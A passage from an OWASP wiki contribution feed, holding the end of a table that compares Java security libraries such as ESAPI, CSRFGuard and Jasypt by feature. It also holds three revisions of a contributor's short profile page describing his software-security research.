| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;amp;nbsp;?&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://www.bouncycastle.org/ Bouncy Castle]&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | 2011&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://www.owasp.org/index.php/Category:OWASP_CSRFGuard_Project CSRFGuard]&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;amp;nbsp;?&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API ESAPI]&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | 2010&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;amp;nbsp;?&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;amp;nbsp;?&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://www.jasypt.org/ Jasypt]&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | 2010&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://sourceforge.net/projects/jguard/ iGuard]&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | 2011&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| [http://www.sapia-oss.org/projects/vlad/ Vlad]&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;amp;nbsp;?&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | Y&amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt; &lt;br /&gt;
| align=&amp;quot;center&amp;quot; | &amp;lt;br&amp;gt;&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== Security Features Key  ==&lt;br /&gt;
&lt;br /&gt;
*AU Authentication &lt;br /&gt;
*AC Authorization / Access Control &lt;br /&gt;
*CF Anti CSRF &lt;br /&gt;
*CR Cryptography &lt;br /&gt;
*IV Input Validation &lt;br /&gt;
*OE Output encoding &lt;br /&gt;
*SM Session management &lt;br /&gt;
*XM XML security &lt;br /&gt;
*XS XSS protection&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Java_Project]]&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=127846</id>
		<title>User:Guifre Ruiz</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=127846"/>
				<updated>2012-04-14T19:08:22Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;I am a computer science student and researcher keen on software security. I have been working for almost two years in a research project related to software security where I did vulnerability assessments of different middlewares. Right now I am working in the same project automating this process by building static/dynamic analysis tools.&lt;br /&gt;
&lt;br /&gt;
You can Find out more about me:&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;on 127.0.0.1[http://caos.uab.es/~gruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Blogger[http://guifreruiz.blogspot.com/]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Twitter[http://twitter.com/guifreruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Linkedin[http://www.linkedin.com/in/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on GitHub[https://github.com/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=116702</id>
		<title>User:Guifre Ruiz</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=116702"/>
				<updated>2011-09-05T17:51:11Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;I am a computer science student and researcher keen on software security. I have been working for almost two years in a research project related to software security where I did vulnerability assessments of different middlewares. Right now I am working in the same project automating this process by building static/dynamic analysis tools.&lt;br /&gt;
&lt;br /&gt;
You can Find out more about me:&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;on 127.0.0.1[http://cs.wisc.edu/~guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Blogger[http://guifreruiz.blogspot.com/]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Twitter[http://twitter.com/guifreruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Linkedin[http://www.linkedin.com/in/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on GitHub[https://github.com/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=116701</id>
		<title>User:Guifre Ruiz</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=User:Guifre_Ruiz&amp;diff=116701"/>
				<updated>2011-09-05T17:50:38Z</updated>
		
		<summary type="html">&lt;p&gt;Guifre Ruiz: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;I am a computer science student and researcher keen on software security. I have been working for almost two years in a research project related to software security where I did vulnerability assessments of different middlewares. Right now I am working in the same project but trying to automate this process by building static/dynamic analysis tools.&lt;br /&gt;
&lt;br /&gt;
You can Find out more about me:&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;on 127.0.0.1[http://cs.wisc.edu/~guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Blogger[http://guifreruiz.blogspot.com/]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Twitter[http://twitter.com/guifreruiz]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on Linkedin[http://www.linkedin.com/in/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;on GitHub[https://github.com/guifre]&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;/div&gt;</summary>
		<author><name>Guifre Ruiz</name></author>	</entry>

	</feed>